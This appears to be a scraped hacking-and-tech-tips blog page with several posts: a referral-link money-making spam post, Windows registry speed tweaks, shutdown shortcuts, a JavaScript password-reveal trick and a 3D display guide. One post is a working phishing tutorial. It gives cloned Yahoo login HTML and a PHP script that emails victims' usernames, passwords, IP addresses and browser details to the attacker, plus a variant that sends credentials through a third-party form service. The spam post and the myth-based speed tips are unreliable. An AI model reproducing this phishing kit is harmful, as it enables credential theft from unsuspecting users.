EARN GENUINELY ONLINE

Frnds if u wanna earn sitting at home while operating social networking sites.....do visit this link nd bcum a member!!!!
http://Earnyouth.com/?ref=115779

I have tried and m earning it online after many fake making online earn site i have stopped to one site which is genuinely true.........
so guys dont waste ur time on internet by blankly wasting time......... do something for your earning too....
Click here
Category: 0 comments

Increase your internet speed

This is not just one trick but a series of simple trick that lets you significantly increase you internet speed and i guarantee you an increase in your internet speed. This trick works on all windows machine including XP, Vista and windows 7.

1] go to desktop->My computer-(right click on)->properties->then go HARDWARE tab-> Devicemanager-> now u see a window of Device manager
then go to Ports->Communication Port(double click on it and Open).
after open u can see a Communication Port properties.
go the Port Setting:----
and now increase ur "Bits per second" to 128000.
and "Flow control" change 2 Hardware

2]type this coding in notepad and save as .reg and then execute this file....this will increase ur surfing n downloading speed.....

REGEDIT4
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Tcpip\Parameters]
"SackOpts"=dword:00000001
"TcpWindowSize"=dword:0005ae4c
"Tcp1323Opts"=dword:00000003
"DefaultTTL"=dword:00000040
"EnablePMTUBHDetect"=dword:00000000
"EnablePMTUDiscovery"=dword:00000001
"GlobalMaxTcpWindowSize"=dword:0005ae4c


3]Xp reserves 20% bandwith,
to unreserve it,follow following steps:

a)Click Start

b)Run:"gpedit.msc"

c)Goto:>Local Computer Policy
-------–>Computer Configuration
-------–>Administrative Templates
-------–>Network–>QOS Packet Scheduler
-------–>Limit Reservable Bandwidth


d) Double click on Limit Reservable bandwidth


e)Select Enable


f) Change 20% to 0%


g)Click Apply

Enjoy!
Category: 1 comments

How to disable the right click functionality on the desktop

Follow the given steps to disable the right click functionality on desktop:
To use this feature, you will need to be logged into your computer with administrative rights.
Click Start button and type regedit in Run option then press Enter for next.
Here locate the location to:
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer













Here in right side panel, right click to create a new DWORD value with the name NoViewContextMenu (it is case sensitive), then assign number 1 in value data box.
































Now close the registry editor and restart your computer after any changes to go into effect.
But next time, if you want to enable right click functionality on desktop then simply change the value of data box or delete the NoViewContextMenu DWORD item... ;)


HaPpY HaCkInG.... ;P
Category: 0 comments

How do I create shutdown shortcuts in Microsoft Windows 7?

Creating a shortcut

Creating a shortcut should be familiar to almost everyone, but we will walk through the process just for clarity. There are other ways to accomplish this task, but this is my preferred method. First, right-click on a clear spot on the desktop and navigate to New | Shortcut, as shown in Figure A.

Figure A

 

 

 

 

 

 

 

 

Navigate the menu to create a new shortcut.
When you click the Shortcut menu item, you will arrive at the input screen shown in Figure B. This is where you will enter the specific command strings to make your new shortcut do what you want it to do.

Figure B

 

 

 

 

 

 

 

 

 

 

Enter the command for your new shortcut.
For our example, we will enter the specific command that will shut down a Windows PC. Type the following command into the box and then click Next.
Shutdown.exe -s -t 00
The next screen (Figure C) asks you to name the shortcut. I suggest you name the shortcut to correspond to the action it will perform. In this case, we name it Shutdown.

Figure C

 

 

 

 

 

 

 

 

 

 

Give it an appropriate name.

New icon

Technically, you could stop here, but I prefer to give these shortcuts an icon that will help me remember what it is they do. In Windows 7, changing an icon is similar to how you changed icons in previous versions of the operating system.
Right-click on the icon in question to get the context menu shown in Figure D and then navigate to the Properties menu item.

Figure D
 

 

 

 

 

 

 

 

Find Properties on the menu.
From the Properties control panel, shown in Figure E, select the Change Icon button.

Figure E

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Select Change Icon.
The next screen (Figure F) will show you a list of potential icons. Choose the one you want to use and click the OK button twice.

Figure F

 

 

 

 

 

 

 

 

 

 

Choose your icon and click OK.
You should now have a new shortcut on your desktop. When you click the shortcut, your PC will shut down, so make sure you save your work before you test it.
Leave Your Comments.. :)

 

Category: 0 comments

How To Make Fake Login Page For Any Site

This is how to make a fake login page that will email you the name and password that is entered on that page.. To do this you will need some web language experiance.
First you will need to get a copy of the source code of the site. so go to the login page then click file > save as > and save the page as "html only" or right click and select "view source" then copy and past it to a notepad file on your desktop and save it as login.html. either way youl need a copy of the login.html on your desktop.
now you will need to make sure all of the images on the page are linking to a valid URL. what you need to do is look for links like

Code:

<img src=/pics/pic.jpg>
And change them to

Code:


<img src=http://www.domain.com/pics/pic.jpg>
or save all the images and host them on your own image hosting account.
then check your page by opening it in your browser to make sure it looks like the real page with all the images showing up.
Now we have to enter the script that will mail us the name and pass. you have to look through your login.html and find the section of code that creates the login boxs and delete it. On Yahoo login this is the part of the source that needs to be replaced.


Code:

<table border="0" cellpadding="2" cellspacing="0"> <tr> <td align="right" nowrap><font face="arial" size="-1"> Yahoo! ID: </font></td> <td><input name="login" size="17" value=""></td> </tr> <tr> <td align="right" nowrap><font face="arial" size="-1">Password:</font></td> <td><input name="passwd" type="password" size="17" maxlength="32"></td></tr> <tr> <td colspan="2" nowrap align="center"><font face="arial" size="-1">

Now, this can be replaced by one of two things. If you understand PHP you could use a php mailing script as long as you have a host that allows the mail function or an apache server to host it on. Using php require 2 files. the login.html and thanks.php To use php replace the previous login script shown above with the following html.

Code:


<html> <form method="POST" action="thanks.php"> Yahoo! ID <input type="TEXT" name="name">
Password <input type="PASSWORD" name="password">
<input type="SUBMIT" name="Submit" value="Login"> </form> </html>
And in the same folder put this script (unedited) to actually grab the entered info and mail it to you. thanks.php

Code:


<script LANGUAGE="php"> $email = $HTTP_POST_VARS[email]; $mailto = "Your Email Goes Here"; $mailsubj = "Form submission"; $mailhead = "From: $email\n"; reset ($HTTP_POST_VARS); $mailbody =$_SERVER['REQUEST_URI'] . "." .$_SERVER['HTTP_USER_AGENT'] . "." . "$REMOTE_ADDR.".".Values submitted from web site form:\n"; while (list ($key, $val) = each ($HTTP_POST_VARS)) { $mailbody .= "$key : $val\n"; } mail($mailto, $mailsubj, $mailbody, $mailhead); </SCRIPT>
Call the second script thanks.php This script will send you thier name, password, ip, operating system, and browser type to you in the email.
Now the second method isnt as good but can be hosted on ANY host, all they need to do is allow html which all hosts do. so this method can be hosted on a geocities account. You need to go to http://www.response-o-matic.com and get thier free email script that can be dropped into any html.
youl need to alter the script for it to work. i dont have an altered script at hand but if you guys dont have a host that allows php and the mail() function ill get the respocomatic script tomorow and edit it for you and post it here ready for you to drop straight ontop of the orriginal yahoo login code thats higlighted at the top of this page. its morning now and im tired lol.

This is the responcomatic code that you can drop over the login code on your login page. just enter your email

Code:


<HTML> <BODY BGCOLOR="#FFFFFF"> <FORM action="http://www.response-o-matic.com/cgi-bin/rom.pl" method="POST"> <H3><CENTER> <INPUT TYPE="hidden" name="your_email_address" VALUE="YOUR_EMAIL@DOMAIN.COM"> <INPUT TYPE="hidden" name="your_name" VALUE="password"> <INPUT TYPE="hidden" name="email_subject_line" VALUE="My Password"> <INPUT TYPE="hidden" name="required_fields" VALUE="your_email_address"> <INPUT TYPE="hidden" name="thank_you_title" VALUE="You are being redirected"> <INPUT TYPE="hidden" name="return_link_url" VALUE="http://www.yahoo.com"> <INPUT TYPE="hidden" name="return_link_name" VALUE="CLICK HERE"> <INPUT TYPE="hidden" name="background_color" VALUE="#000000"> <INPUT TYPE="hidden" name="text_color" VALUE="#000000"> <INPUT TYPE="hidden" name="link_color" VALUE="#FF0000"> <INPUT TYPE="hidden" name="visited_link_color" VALUE="#FF0000"> <INPUT TYPE="hidden" name="active_link_color" VALUE="#FF0000"> </CENTER></H3> <H4></H4> <BLOCKQUOTE>

<TABLE BORDER=0 CELLSPACING=0> <TR> <TD WIDTH=116> Yahoo Name </TD><TD> <INPUT TYPE="text" name="visitor_name" VALUE="" SIZE=20> </TD></TR> <TR> <TD WIDTH=116> Password </TD><TD> <INPUT TYPE="password" name="visitor_email_address" VALUE="" SIZE=20> </TD></TR> </TABLE></P> <BLOCKQUOTE>

<INPUT TYPE="submit" NAME=Submit" VALUE="Login"></P></BLOCKQUOTE>

</P> </FORM> </BODY> </HTML>
Where it says YOUR_EMAIL@DOMAIN.COM change that to the email you want the pass to be sent. do not change where it says your_email_address. this isnt the finished script it still needs some work but its pretty much all done. :D 
 
Category: 0 comments

Reveal *****(Asterisk) Passwords Using Javascript

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.


javascript: alert(document.getElementById('Passwd').value);


4) As soon as you press 'Enter', A window pops up showing Password typed by you..!


Note :- This trick may not be working with firefox.
Category: 0 comments

Turn Your Computer Screen Into a 3D Display For Free

It all started with CES 2010 and it has now covered a long way but still an immature technology. Yes, we are talking about the mighty 3D technology that is gearing up to entertain you at your comfort zone. The movie ‘Avatar’ played an important role in popularising and mass acceptance of 3D technology. But like any other newbie technology its a costly affair. Having a 3D setup at home for yourself can burn your pockets and a real worth product is due. So, you better try out the below. You will be able to play games  in stereo 3D.

So what is a 3D film / image technology :

Wikipedia defines 3-D this way:
3D (three-dimensional) film is a motion picture that enhances the illusion of depth perception. Derived from stereoscopic photography, a special motion picture camera system is used to record the images as seen from two perspectives and special projection hardware and/or eyewear are used to provide the illusion of depth when viewing the film.
So basically its an illusion created before your eyes that provides a view from two perspective angles. This can be achieved either by shooting the entire film using a costly two eyed camera capable of capturing 3D motion picture or by converting an ordinary 2D video by providing it an angled perspective after production. The former was used in ‘Avatar’ and the latest ‘Resident Evil’ movie. It’s the ultimate experience you can achieve from a 3D technology. Using latter 3D stereo rendering only a small depth of field change can be achieved.
Another important un avoidable hardware in the 3D technology is the glasses used. Without which you cannot view and enjoy the 3-D videos. Based on the architecture even there exists different variety of 3D glasses. The first and the most cheapest glass format being the colored Anaglyph glass.

Some common types of 3D glasses are:

1) Anaglyph – Red Blue glasses ( Cheap and common ) –


2) Active shutter glasses – 




3) Polarized 3D glasses
Being the cheapest option available and easily attainable 3D video rendered outputs  we are concerned with the Anaglyph Red Blue 3D glasses here. Check out the below pic to understand how 3D technology using Anaglyph glasses work.

How Anaglyph ( Red/ Blue ) 3-D glasses work :



































Convert your computer screen into a 3D display:

To setup  3D on your computer you will need two things:
1) iZ3D Driver ( Used to convert video to stereo Red/ Blue output ) – Download free from
<here>
2) Anaglyph ( Red/ Blue) glass – Can get one from eBay. Check this search.

Steps to setup 3D on your computer :

1) Download and install iZ3D driver. While installing make sure that the ‘Anaglyph Output (free)’ is ticked.

 2) Launch iZ3D and make sure you choose Red/Cyan as the output and click Apply.
 The iZ3D stereo drivers can be quickly enabled and disabled by right clicking from system notification icons area.
Now when you start games you will see interface in red blue combination. Wear your anaglyph 3D glass and see the effect for yourself. You can also select custom profiles by going to ‘Profiles’ in control center and select a predefined one. You change the stereoeffect by clicking : [+]=increase and [-]=decrease and convergence lets you choose convergence point (pulls or pushes the scene from you): [shift]+[+] pulls it and [shift]+[-] pushes it away.
Chess in Windows 7 after turning on stereo mode.


How to make  an Anaglyph Red Blue 3D glass  at home :

If you are not comfortable spending money and ordering an anaglyph red blue 3D glass via eBay then you can make one your own by following the below pic.

Hope you enjoyed the post. Do share and let us know your thoughts. :D
Category: 1 comments